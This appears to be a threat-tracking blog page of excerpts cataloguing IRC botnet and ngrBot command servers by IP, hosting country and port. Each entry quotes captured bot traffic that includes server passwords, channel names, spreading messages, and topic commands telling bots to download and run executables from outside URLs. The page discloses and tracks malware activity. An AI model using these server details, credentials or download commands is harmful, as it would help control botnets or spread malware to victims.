Very big irc botnet now for rent and hosted in france Resolved : [a.xludakx.com] To [92.243.27.72] 92.243.27.72 5900 leaf nr4 92.243.17.156 5900 resolved [b.xludakx.com] to (92.242.140.48) resolved [c.xludakx.com] to (92.242.140.48) resolved [d.xludakx.com] to (92.242.140.48) Remote Host Port Number 199.15.234.7 80 92.243.26.81 80 PASS ngrBot 92.243.26.81 3212 92.243.20.57 80 leaf nr2 Resolved : [haso.dukatlgg.com] To [92.243.27.178]Read more...
139.91.102.101(irc botnet hosted in Greece Foundation Of Research And Technology Hellas)
Remote Host Port Number 139.91.102.101 9595 PASS weed JOIN #VN# junglist USERHOST [00|USA|XP|SP2]-3905 MODE [00|USA|XP|SP2]-3905 +x NICK [00|USA|XP|SP2]-3905 USER hcyv 0 0 :[00|USA|XP|SP2]-3905 PONG :2FEDAA4A hosting infos: http://whois.domaintools.com/139.91.102.101
64.32.28.18(irc botnet hosted in United States Huntington Beach Sharktech Internet Services)
Remote Host Port Number 64.32.28.18 6667 PONG irc.insom.org JOIN #vnc# rage PRIVMSG #vnc# : 14,1.:[ 15,1rAGEBoT 14,1]:. 15,1 range: 201 with 100 threads. (autorooting) 15,1 p2p spread started. 15,1 rarworm activated. hosting infos: http://whois.domaintools.com/64.32.28.18
i.trizztal.info(ngrBot hosted in Russian Federation Moscow Oao Webalta)
i.trizztal.info 92.241.165.133 Remote Host Port Number 199.15.234.7 80 92.241.165.133 1863 PASS ngrBot NICK n{US|XPa}hozcoie USER hozcoie 0 0 :hozcoie Now talking in #start Topic On: [ #start ] [ *mdns http://policlinicodelsur.com/ostia.txt *msn.int # *msn.set jajajajajajajajajjajajaja viste esto? lol http://bit.ly/qZLzx8?/############/******/animacion ] Topic By: [ z3r0fr3ak ] files used to spread malware: http://adf.ly/3CnwR UPDATE: Remote Host PortRead more...
91.121.115.74(irc botnet hosted in France Ovh Systems)
Remote Host Port Number 67.205.76.102 6667 91.121.115.74 6667 NICK [MW]-XDCC-MOV88 MODE [MW]-XDCC-MOV880 +iBxpTW PRIVMSG nickserv :IDENTIFY 3013723 NOTICE SecureServ : VERSION MaSTeRWaReZ-v1 3.27 (Win32) 1.7.9, http://MaSTeRWaReZ-v1.net/ – geoip,upnp,gnutls,ruby USER NoT 32 . :NoT PING doubledown.trolol.net JOIN #MASTERWAREZ PRIVMSG #MASTERWAREZ :!voiceme NICK [MW]-XDCC-MOV880 PONG :B28F6F42 PONG :A4A05D7C NOTICE IRC : NOTICE DaggeredAngel : PING Unstable.AlphaIRC.com hostingRead more...
61.153.224.178(irc botnet hosted in China Zhejiang Jiaxing Telecom Co. Ltd Value-added Business Department)
Remote Host Port Number 208.83.20.130 6667 61.153.224.178 8000 NICK jtqlcmy USERHOST jtqlcmy NICK :birkd SILENCE +*,~*!*@*undernet.org MODE jtqlcmy +i ISON adi adrian adryan ady cristi cristian cristy demon devil luci lucian ru sebastian sebi vasi vasy }{ USER epekfh “” “208.83.20.130” :YthcpQrg MODE birkd +wxi NICK oouod USER xhuyn “” “208.83.20.130” :Woozcy PONG :3859371153 USERHOSTRead more...
sean06.com(ngrBot hosted in Canada Zenkis.ca)
Resolved : [sean06.com] To [72.55.132.189] Remote Host Port Number 195.78.76.16 80 199.15.234.7 80 72.55.132.189 5794 PASS ngrBot NICK n{US|XPa}purvgtk USER purvgtk 0 0 :purvgtk JOIN #chan ngrBot PRIVMSG #chan :[d=”http://www.flashgames-community.com/_server/video/1asdfasupdpelugay.exe” s=”116746 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataWcxaxw.exe” – Download retries: 0 * The data identified by the following URLs was then requested fromRead more...
microsoft-ftp.com(CCTEAM botnet hosted in Russian Federation Moscow State Institute Of Information Technologies And Telecommunications (siit&t Informika))
Resolved : [microsoft-ftp.com] To [85.143.50.132] Remote Host Port Number 201.151.191.146 21 201.151.191.146 80 204.0.5.57 80 85.143.50.132 80 USER microsoft JOIN #L0bby 9208i1533G MODE #L0bby PRIVMSG #L0bby :I’m New 0wned Bot PRIVMSG #L0bby :USB Spread file not found in my system. Downloading now… PRIVMSG #L0bby :Starting download… (Total size: 1.22MB) PRIVMSG #L0bby :Download of disk.exe completedRead more...
208.117.34.14(ngrBot hosted in United States Laird Hill Steadfast Networks)
Remote Host Port Number 199.15.234.7 80 208.117.34.14 1888 PASS strike NICK n{US|XPa}erricpf USER erricpf 0 0 :erricpf Now talking in #asdf Topic On: [ #asdf ] [ ~pu http://dc396.4shared.com/download/YS_I941c/fdsfd67.exe 159ab654e72ffcf9aa3352d4b43a74e8 ] Topic By: [ google ] hosting infos: http://whois.domaintools.com/208.117.34.14
67.205.76.102(irc botnet hosted in Canada Iweb Dedicated Cl)
Remote Host Port Number 67.205.76.102 6667 PONG 948D7E30 JOIN #notorious 3013723 PRIVMSG #notorious : 14,1.:[ 15,1r4g3b0T 14,1]:. 15,1 range: 190 with 100 threads. (autorooting) hosting infos: http://whois.domaintools.com/67.205.76.102